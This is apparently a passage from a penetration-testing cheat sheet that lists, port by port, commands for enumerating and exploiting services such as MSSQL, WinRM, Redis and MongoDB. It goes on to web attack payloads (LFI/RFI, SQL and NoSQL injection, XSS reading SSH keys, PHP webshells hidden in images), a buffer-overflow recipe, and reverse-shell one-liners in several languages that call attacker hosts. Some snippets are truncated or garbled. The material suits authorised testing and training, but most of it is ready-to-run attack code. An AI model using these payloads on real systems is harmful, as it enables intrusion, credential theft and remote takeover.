### Port 873 - Rsync

```bash

# Enumeration

nc -vn 127.0.0.1 873

(UNKNOWN) [127.0.0.1] 873 (rsync) open

@RSYNCD: 31.0        <--- You receive this banner with the version from the server

@RSYNCD: 31.0        <--- Then you send the same info

# list                <--- Then you ask the sever to list

raidroot             <--- The server starts enumerating

USBCopy

NAS_Public

_NAS_Recycle_TOSRAID    <--- Enumeration finished

@RSYNCD: EXIT         <--- Sever closes the connection

nmap -sV --script "rsync-list-modules" -p 873 $IP

msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port

rsync -av --list-only rsync://[$IP-V6]:8730

# manual

rsync -av --list-only rsync://$IP/shared_name

```

### Port 1026 - Rusersd

```bash

# Enumeration

apt-get install rusers

rusers -l $IP

Sending broadcast for rusersd protocol version 3...

Sending broadcast for rusersd protocol version 2...

tiff       potatohead:console         Sep  2 13:03   22:03

katykat    potatohead:ttyp5           Sep  1 09:35      14

```

### Port 1028 / 1099 - Java RMI

```bash

# Enumeration

# Basically this service could allow you to execute code.

msf > use auxiliary/scanner/misc/java_rmi_server

msf > use auxiliary/gather/java_rmi_registry

nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1028 $IP

# Reverse Shell

msf > use exploit/multi/browser/java_rmi_connection_impl

```

### Port 1030/1032/1033/1038

- Used by RPC to connect in domain network.

### MSSQL - 1433

```bash

# info

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 

msf> use auxiliary/scanner/mssql/mssql_ping

nmap -p 1433 -sU --script=ms-sql-info.nse $IP

sqsh -S $IP -U  -P  -D 

# OR

sqsh -S $IP -U sa

    xp_cmdshell 'date'

    go

#msfconsole

#Set USERNAME, RHOSTS and PASSWORD

#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM

msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering

msf> use admin/mssql/mssql_enum #Security checks

msf> use admin/mssql/mssql_enum_domain_accounts

msf> use admin/mssql/mssql_enum_sql_logins

msf> use auxiliary/admin/mssql/mssql_findandsampledata

msf> use auxiliary/scanner/mssql/mssql_hashdump

msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data

msf> use auxiliary/admin/mssql/mssql_findandsampledata

msf> use auxiliary/admin/mssql/mssql_idf

#Privesc

msf> use exploit/windows/mssql/mssql_linkcrawler

msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate

msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution

msf> use admin/mssql/mssql_exec #Execute commands

msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session

msf> use windows/manage/mssql_local_auth_bypass

```

### Port 1521 - Oracle

```bash

oscanner -s $IP -P 1521

tnscmd10g version -h $IP

tnscmd10g status -h $IP

nmap -p 1521 -A $IP

nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute

#MSF

use auxiliary/admin/oracle

use auxiliary/scanner/oracle

```

### Port 1723 - PPTP

```bash

# Enumeration

nmap –Pn -sSV -p1723 $IP

```

### Port 1883 - MQTT (Mosquitto)

To connect to a MQTT service you can use: https://github.com/bapowell/python-mqtt-client-shell

```bash

> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)

> subscribe "#" 1

> subscribe "$SYS/#"

```

Or you could run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them:

```python

#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py

import paho.mqtt.client as mqtt

import time

import os

HOST = "127.0.0.1"

PORT = 1883

def on_connect(client, userdata, flags, rc):

    client.subscribe('#', qos=1)

    client.subscribe('$SYS/#')

def on_message(client, userdata, message):

    print('Topic: %s | QOS: %s  | Message: %s' % (message.topic, message.qos, message.payload))

def main():

    client = mqtt.Client()

    client.on_connect = on_connect

    client.on_message = on_message

    client.connect(HOST, PORT)

    client.loop_start()

    #time.sleep(10)

    #client.loop_stop()

if __name__ == "__main__":

    main()

```

### Port 2049 - NFS TNS Listener

```bash

# enumeration

# nmap scripts

nfs-ls #List NFS exports and check permissions

nfs-showmount #Like showmount -e

nfs-statfs #Disk statistics and info from NFS share

# msf modul

scanner/nfs/nfsmount #Scan NFS mounts and list permissions

# Mounting

showmount -e $IP

mount -t nfs [-o vers=2] $IP:  -o nolock

```

### Port 2100 - Oracle XML DB

```sh

#FTP

    sys:sys

    scott:tiger

```

 - list of passwords :

https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

### Port 3260 - ISCSI

```bash

# Enumeration

nmap -sV --script=iscsi-info -p 3260 $IP

# Manual enumeration

sudo apt-get install open-iscsi

iscsiadm -m discovery -t sendtargets -p $IP:3260

123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe

[2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382

[fe80::211:3232:fab9:1223]:3260,1 iqn.2000-01.com.synology:Oassdx.Target-1.d0280fd382

# Then you catch the 2nd part of the printed string of each line

iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login

Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] (multiple)

Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.

# logout

iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout

```

### Port 3299 - SAPRouter

Copy of: https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/

```bash

msf> use auxiliary/scanner/sap/sap_service_discovery

msf auxiliary(sap_service_discovery) > set RHOSTS $IP

RHOSTS => $IP

msf auxiliary(sap_service_discovery) > run

[*] [SAP] Beginning service Discovery '1.2.3.101'

[+] 1.2.3.101:3299      - SAP Router OPEN

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf > use auxiliary/scanner/sap/sap_router_info_request

```

### MySQL - 3306

```bash

# Enumeration

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $IP

msf> use auxiliary/scanner/mysql/mysql_version

msf> use uxiliary/scanner/mysql/mysql_authbypass_hashdump

msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds

msf> use auxiliary/admin/mysql/mysql_enum #Creds

msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds

msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

# Connect Remote

mysql -h  -u root

mysql -h  -u root@localhost

```

### Port 3339 - Oracle web interface

Basic info about web service (apache, nginx, IIS)

### Port 3389 - RDP

```bash

# enum

nmap -p 3389 --script=rdp-vuln-ms12-020.nse $IP

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 

# Connect with known credetials/hash

rdesktop -u  $IP

rdesktop -d  -u  -p  $IP

xfreerdp /u:[domain\] /p: /v:$IPP

xfreerdp /u:[domain\] /pth: /v:$IP

# Check known credentials

rdp_check \:@$IP

[Post-Exploitation](https://github.com/JoelGMSec/AutoRDPwn)

# Launch CMD with other cretentials so they are used in the network

runas /netonly /user\ "cmd.exe" ::The password will be prompted

```

### Port 3632 - distcc

Resources :

* https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

* https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

### Port 4369 - Erlang Port Mapper Daemon (epmd)

```bash

# Enumeration

echo -n -e "\x00\x01\x6e" | nc -vn $IP 4369

# Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html

dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb

apt-get install erlang

erl # Once Erlang is installed this will promp an erlang terminal

1> net_adm:names(''). # This will return the listen addresses

# Automatic

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $IP

PORT     STATE SERVICE VERSION

4369/tcp open  epmd    Erlang Port Mapper Daemon

| epmd-info:

|   epmd_port: 4369

|   nodes:

|     bigcouch: 11502

|     freeswitch: 8031

|     ecallmgr: 11501

|     kazoo_apps: 11500

|_    kazoo-rabbitmq: 25672

```

### Port 5353 / UDP - Multicast DNS (mDNS)

```bash

# Enumeration

nmap -Pn -sUC -p5353 192.168.1.2

Starting Nmap 6.46 (http://nmap.org) at 2015-01-01 10:30 GMT

Nmap scan report for 192.168.1.2

PORT     STATE SERVICE

5353/udp open  zeroconf

```

### Port 5432 / 5433 -  Postgresql

```bash

# Connect

psql -U  # Open psql console with user

# Remote connection

psql -h $IP -U  -d 

psql -h $IP -p  -U  -W  

psql -h localhost -d  -U  #Password will be prompted

\list # List databases

\c  # use the database

\d # List tables

#To read a file:

CREATE TABLE demo(t text);

COPY demo from '[FILENAME]';

SELECT * FROM demo;

# Enumeration

msf> use auxiliary/scanner/postgres/postgres_version

msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

```

### Port 5671 - AMQP

```python

import amqp

#By default it uses default credentials "guest":"guest"

conn = amqp.connection.Connection(host="", port=5672, virtual_host="/")

conn.connect()

for k, v in conn.server_properties.items():

    print(k, v)

```

```bash

# Automatic

nmap -sV -Pn -n -T4 -p 5672 --script amqp-info $IP

```

### Port 5985 / 5986 - WinRM

5985/tcp (HTTP)

5986/tcp (HTTPS)

```bash

gem install evil-winrm

evil-winrm -i $IP -u Administrator -p 'password1'

# Pass the hash with evil-winrm

evil-winrm -i $IP -u Administrator -H 'hash-pass'

```

Code extracted from here: https://alamot.github.io/winrm_shell/

```ruby

require 'winrm-fs'

# Author: Alamot

# To upload a file type: UPLOAD local_path remote_path

# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt

conn = WinRM::Connection.new(

  endpoint: 'https://IP:PORT/wsman',

  transport: :ssl,

  user: 'username',

  password: 'password',

  :no_ssl_peer_verification => true

)

class String

  def tokenize

    self.

      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).

      select {|s| not s.empty? }.

      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}

  end

end

command=""

file_manager = WinRM::FS::FileManager.new(conn)

conn.shell(:powershell) do |shell|

    until command == "exit\n" do

        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")

        print(output.output.chomp)

        command = gets

        if command.start_with?('UPLOAD') then

            upload_command = command.tokenize

            print("Uploading " + upload_command[1] + " to " + upload_command[2])

            file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|

                puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")

            end

            command = "echo `nOK`n"

        end

        output = shell.run(command) do |stdout, stderr|

            STDOUT.print(stdout)

            STDERR.print(stderr)

        end

    end

    puts("Exiting with code #{output.exitcode}")

end

```

```

#Msf

msf > use auxiliary/scanner/winrm/winrm_login

    #Bruteforce

msf > use auxiliary/scanner/winrm/winrm_login

    #Running Commands

msf > use auxiliary/scanner/winrm/winrm_cmd

    #Getting Shells!

msf > use exploit/windows/winrm/winrm_script_exec

```

### VNC - 5800 / 5801 / 5900 / 5901 -  VNC

```bash

# Enumeration

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p  $IP

msf> use auxiliary/scanner/vnc/vnc_none_auth

# Connect to vnc using Kali

vncviewer [-passwd passwd.txt] $IP::5901

```

### Port 5984 - CouchDB

```bash

# Enumeration

nmap -sV --script couchdb-databases,couchdb-stats -p 5984 $IP

msf> use auxiliary/scanner/couchdb/couchdb_enum

curl http://IP:5984/

# The reply should look something like:

{"couchdb":"Welcome","version":"0.10.1"}

```

References :

* https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html

### Port 6000 - X11

```bash

# enumeration

nmap -sV --script x11-access -p 6000 $IP

msf> use auxiliary/scanner/x11/open_x11

# Remote Desktop View Way from:

https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

# Get Shell

msf> use exploit/unix/x11/x11_keyboard_exec

```

### Redis - 6379

```bash

# Enumeration

nmap --script redis-info -sV -p 6379 $IP

msf> use auxiliary/scanner/redis/redis_server

https://github.com/Avinash-acid/Redis-Server-Exploit

python redis.py 10.10.10.160 redis

# redis-tools

sudo apt-get install redis-tools

redis-cli -h 192.168.0.24

192.168.0.24:6379> info

192.168.0.24:6379> CONFIG GET *

192.168.0.24:6379> keys *

192.168.0.24:6379> get 351115ba5f690fb9b1bdc1b41e673a94 #This is a key list on the last command

# auto exploit

redis-cli -h 192.168.0.24

192.168.0.24:6379> info

192.168.0.24:6379> CONFIG GET *

192.168.0.24:6379> keys *

192.168.0.24:6379> get 351115ba5f690fb9b1bdc1b41e673a94 #This is a key list on the last command

```

### Port 8009 - Apache JServ Protocol (AJP)

Basic Information :

From: https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/

```bash

# Enumeration

nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 $IP

```

### MsDeploy - 8172

Microsoft IIS Deploy port

```bash

$IP:8172/msdeploy.axd

```

### Webdav

```bash

davtest -cleanup -url http://$IP

cadaver http://$IP

```

### Port 9042 / 9160 -  Cassandra

```bash

#Enumeration

pip install cqlsh

cqlsh $IP

#Basic info enumeration

SELECT cluster_name, thrift_version, data_center, partitioner, native_protocol_version, rack, release_version from system.local;

#Keyspace enumeration

SELECT keyspace_name FROM system.schema_keyspaces;

desc     #Decribe that DB

desc system_auth        #Describe the DB called system_auth

SELECT * from system_auth.roles;  #Retreive that info, can contain credential hashes

SELECT * from logdb.user_auth;    #Can contain credential hashes

SELECT * from logdb.user;

SELECT * from configuration."config";

# auto

nmap -sV --script cassandra-info -p 9042,9160 $IP

```

### Port 9100 - Raw Printing (JetDirect, AppSocket, PDL-datastream)

```bash

# Enumeration

nmap -sV --script pjl-ready-message -p  $IP

msf> use auxiliary/scanner/printer/printer_env_vars

msf> use auxiliary/scanner/printer/printer_list_dir

msf> use auxiliary/scanner/printer/printer_list_volumes

msf> use auxiliary/scanner/printer/printer_ready_message

msf> use auxiliary/scanner/printer/printer_version_info

msf> use auxiliary/scanner/printer/printer_download_file

msf> use auxiliary/scanner/printer/printer_upload_file

msf> use auxiliary/scanner/printer/printer_delete_file

```

[Printers Hacking tool](https://github.com/RUB-NDS/PRET)

### Port 9200 - Elasticsearch

Read this https://www.elastic.co/what-is/elasticsearch

```bash

# Enumeration

firefox http://$IP:9200/

```

You can gather all the indices accessing `http://10.10.10.115:9200/_cat/indices?v`

```sh

health status index   uuid                   pri rep docs.count docs.deleted store.size pri.store.size

green  open   .kibana 6tjAYZrgQ5CwwR0g6VOoRg   1   0          1            0        4kb            4kb

yellow open   quotes  ZG2D1IqkQNiNZmi2HRImnQ   5   1        253            0    262.7kb        262.7kb

yellow open   bank    eSVpNfCfREyYoVigNWcrMw   5   1       1000            0    483.2kb        483.2kb

```

... in build

### Port  10000 - Network Data Management Protocol (ndmp)

```bash

# Enumeration

nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 $IP

```

### Port 11211 - Memcache

To ex-filtrate all the information saved inside a memcache instance you need to:

1 ) Find slabs with active items

2 ) Get the key names of the slabs detected before

3 ) Ex-filtrate the saved data by getting the key names

```bash

echo "version" | nc -vn $IP 11211      #Get version

echo "stats" | nc -vn $IP 11211        #Get status

echo "stats slabs" | nc -vn $IP 11211  #Get slabs

echo "stats items" | nc -vn $IP 11211  #Get items of slabs with info

echo "stats cachedump  0" | nc -vn $IP 11211  #Get key names

echo "get " | nc -vn $IP 11211  #Get saved info

#This php will just dumo the keys, you need to use "get  later"

sudo apt-get install php-memcached

php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );'

# auto mode ;)

nmap -n -sV --script memcached-info -p 11211 $IP   #Just gather info

msf > use auxiliary/gather/memcached_extractor      #Extracts saved data

msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible

```

### Port 15672 - RabbitMQ Management

[management plugin](https://www.rabbitmq.com/management.html)

The default credentials are "guest":"guest"

```bash

# Enumeration

rabbitmq-plugins enable rabbitmq_management

service rabbitmq-server restart

```

### Port 27017 / 27018 - MongoDB

```python

from pymongo import MongoClient

client = MongoClient(host, port, username=username, password=password)

client.server_info() #Basic info

#If you have admin access you can obtain more info

admin = client.admin

admin_info = admin.command("serverStatus")

cursor = client.list_databases()

for db in cursor:

    print(db)

    print(client[db["name"]].list_collection_names())

#If admin access, you could dump the database also

```

```bash

# Some MongoDB commnads:

show dbs

use 

show collections

db..find()  #Dump the collection

db..count() #Number of records of the collection

db.current.find({"username":"admin"})  #Find in current db the username admin

# Automatic

nmap -sV --script "mongo* and default" -p 27017 $IP

# Login

mongo $IP

mongo $IP:

mongo $IP:/

mongo  -u  -p ''

nmap -n -sV --script mongodb-brute -p 27017 $IP

# Look inside /opt/bitnami/mongodb/mongodb.conf to know if credentials are needed:

grep "noauth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#" #Not needed

grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not needed

```

### Port 44818 / UDP / TCP - EthernetIP

en.wikipedia.org/wiki/EtherNet/IP

```bash

# Enumeration

nmap -n -sV --script enip-info -p 44818 $IP

pip3 install cpppo

python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a $IP

```

### Port 47808 / udp - BACNet

```bash

# Enumeration

pip3 install BAC0

import BAC0

bbmdIP = '$IP:47808'

bbmdTTL = 900

bacnet = BAC0.connect(bbmdAddress=bbmdIP, bbmdTTL=bbmdTTL) #Connect

bacnet.vendorName.strValue

# Or just use nmap

nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 $IP

```

### Port 50030 / 50060 / 50070 / 50075 / 50090 - Hadoop

Basic Information

Apache Hadoop is an open source framework supporting the distributed storage and processing of large datasets using computer clusters.

Storage is handled by the Hadoop Distributed File System (HDFS) and processing is performed by using MapReduce and other applications (e.g., Apache Storm, Flink, and Spark) via YARN.

### Unknown ports

```bash

amap -d $IP 8000

# netcat: makes connections to ports. Can echo strings or give shells:

nc -nv $IP 110

```

* Try zone transfer for subdomains:

```bash

dig axfr @$IP hostname.box

dnsenum $IP

dnsrecon -d domain.com -t axfr

```

### Port 80 - web server

* Navigate && robots.txt &&sitemap.xml :smirk:

* Headers

* Source Code

```bash

# Server Version (Vulnerable?)

whatweb -a 1  #Stealthy

whatweb -a 3  #Aggresive

webtech -u 

# Nikto

nikto -h http://$ip

# CMS Explorer

cms-explorer -url http://$IP -type [Drupal, WordPress, Joomla, Mambo]

# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)

wpscan --url http://$IP

wpscan --url http://$IP --enumerate vp

wpscan --url http://$IP --enumerate vt

wpscan --url http://$IP --enumerate u

wpscan -e --url https://url.com

# Enum User:

for i in {1..50}; do curl -s -L -i https://ip.com/wordpress\?author=$i | grep -E -o "Location:.*" | awk -F/ '{print $NF}';done

# Joomscan

joomscan -u  http://$IP

joomscan -u  http://$IP --enumerate-components

# Get header

curl -i $IP

# Get options

curl -i -X OPTIONS $IP

# Get everything

curl -i -L $IP

curl -i -H "User-Agent:Mozilla/4.0" http://$IP:8080

# Check for title and all links

curl $IP -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Look at page with just text

curl $IP -s -L | html2text -width '99' | uniq

# Check if it is possible to upload

curl -v -X OPTIONS http://$IP/

curl -v -X PUT -d '' http://$IP/test/shell.php

# Simple curl POST request with login data

curl -X POST http://$IP/centreon/api/index.php?action=authenticate -d 'username=centreon&password=wall'

curl -s  http://$IP/fileRead.php -d 'file=fileRead.php' | jq -r ."file"

# Google Dork

site:domain.com intext:user

https://github.com/sushiwushi/bug-bounty-dorks

```

#### Url Brutforce

```bash

# Ffuf

ffuf -c -e '.htm','.php','.html' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u https://$IP/FUZZ

# Dirb not recursive

dirb http://$IP -r -o dirb-$IP.txt

# Wfuzz

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://$IP/FUZZ

gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/common.txt -x php -e # add -k for https

# dirseache

git clone https://github.com/maurosoria/dirsearch.git

cd dirsearch

./dirsearch.py -u http://$IP -e php,txt,html -x 404

./dirsearch.py -r -f -u https://google.com --extensions=htm,html,asp,aspx,txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 40

# Crawl:

dirhunt https://url.com/

hakrwaler https://url.com/

# Sub domain brut

https://github.com/aboul3la/Sublist3r

```

- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md

#### Default_Weak login

```bash

site:domain.com password

admin admin

admin password

admin 

admin 

root root

root admin

root password

root 

 password

 admin

 username

username 

```

> list of user names

https://github.com/danielmiessler/SecLists/tree/master/Usernames

#### LFI-RFI

```bash

#Fimap

fimap -u "http://$IP/example.php?test="

curl -s http://$IP/gallery.php?page=/etc/passwd

#Use in "page="

php://filter/convert.base64-encode/resource=/etc/passwd

http://$IP/maliciousfile.txt%00

php://filter/convert.base64-encode/resource=../config.php

php://filter/convert.base64-encode/resource=../../../../../boot.ini

# LFI Windows  :warning:

LANG=../../windows/system32/drivers/etc/hosts%00

LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig

# Contaminating log files

root@kali:~# nc -v $IP 80

$IP: inverse host lookup failed: Unknown host

(UNKNOWN) [$IP] 80 (http) open

 

# Contaminating log files

[root:~]# nc -v $IP 80

$IP: inverse host lookup failed: Unknown host

(UNKNOWN) [$IP] 80 (http) open

 

# RFI:

http://$IP/addguestbook.php?LANG=http://$IP:31/evil.txt%00

Content of evil.txt:

# PHP Filter:

http://$IP/index.php?m=php://filter/convert.base64-encode/resource=config

# RFI over SMB (Windows)

cat php_cmd.php

    

  Start SMB Server in attacker machine and put evil script

  Access it via browser (2 request attack):

lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"

lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234

```

> read this :

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

#### Sql-injection

```bash

#POST

sqlmap.py -r search-test.txt

#GET

sqlmap -u "http://$IP/index.php?id=1" --dbms=mysql

#FULL ;)

sqlmap -u 'http://$IP:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch

# NoSQL

' || 'a'=='a

#in URL

username[$ne]=0xtz&password[$ne]=0xtz  # :joy: i'm never use this user name

#in JSON

{"username": {"$ne": null}, "password": {"$ne": null}}

{"username": {"$gt":""}, "password": {"$gt":""}}

```

[sql-injection-authentication-bypass-cheat-sheet](https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/)

[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

#### XSS

```javascript

alert("XSS")

alert(1)

"  x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); 

"  x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); 

# XXE

XML entry that reads server, Doctype, change to entity "System "file:///etc/passwd""

#Instead POST:

    

        

    ]>

    hack  &book;

#Malicious XML:

]>Hack

%26book%3B

```

#### Sql-login Bypass

>Open Burp-suite

Make and intercept a request

Send to intruder

Cluster attack.

Paste in sqlibypass-list

    https://bobloblaw.gitbooks.io/security/content/sql-injections.html

Attack

Check for response length variation

#### Bypass img Upload

```bash

Change extension: .pHp3 or pHp3.jpg

Modify mimetype: Content-type: image/jpeg

Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg

Add gif header: GIF89a;

All at the same time.

# inject PHP into img

exiv2 -c'A ""!' shell.jpeg

exiftool -Comment='"; system($_GET['cmd']); ?>' shell.jpg

```

### Online crackers

https://hashkiller.co.uk/Cracker

https://www.cmd5.org/

https://www.onlinehashcrack.com/

https://gpuhash.me/

https://crackstation.net/

https://crack.sh/

https://hash.help/

https://passwordrecovery.io/

http://cracker.offensive-security.com/

# Vulnerability analysis

## Buffer Overflow

```bash

# BASIC GUIDE

1. Send "A"*1024

2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH

3. When crash "!mona findmsp" (E$IP offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"

4. Confirm the location with "B" and "C"

5. Check for badchars instead CCCC (ESP):

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"

... )

with script _badchars.py and

"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"

 5.1 AWESOME WAY TO CHECK BADCHARS ( https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/ ):

    a. !mona config -set workingfolder c:\logs\%p

    b. !mona bytearray -b "\x00\x0d"

    c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again

    d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)

    e. In " data", before unicode chars it shows badchars.

 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"

6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"

6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f

7. Generate shellcode and place it:

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00"

msfvenom -p windows/shell_reverse_tcp lhost=$IP lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode

8. Final buffer like:

buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

```

## Find xploits - Searchsploit and google

```bash

#Google

site:exploit-db.com apache 2.X.X

searchsploit Apache 2.X.X

searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"

```

## Reverse Sells

```bash

# Linux

bash -i >& /dev/tcp/$IP/4443 0>&1

/bin/sh -i > /dev/tcp/x.x.x.x/6969 0<&1 2>&1

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP 4443 >/tmp/f

nc -e /bin/sh $IP 4443

# Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\

# Perl

perl -e 'use Socket;$i="$IP";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Windows

nc -e cmd.exe $IP 4443

# from cmd

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

# PowerShell

PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-PowerShellTcp.ps1')

# PHP

$sock, 1=>$sock, 2=>$sock), $pipes);?>

php -r '$sock=fsockopen("x.x.x.x",6969);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",6969).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

#OR use rsg

https://github.com/mthbernardes/rsg

rsg  

```

# Privilege escalation

## Common

### Set up Webserver

```bash

python -m SimpleHTTPServer 80

python3 -m http.server

ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"

php -S 0.0.0.0:80

https://github.com/sc0tfree/updogupdog

```

```python

import SimpleHTTPServer

import SocketServer

PORT = 8000

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "serving at port", PORT

httpd.serve_forever()

```

### Set up FTP Server

```bash

# Install pyftpdlib

pip install pyftpdlib

# Run (-w flag allows anonymous write access)

python -m pyftpdlib -p 21 -w

```

### Filet ransfer

```bash

#On sending machine

nc -w 3 [destination] 1234 < send.file

#on receiving end:

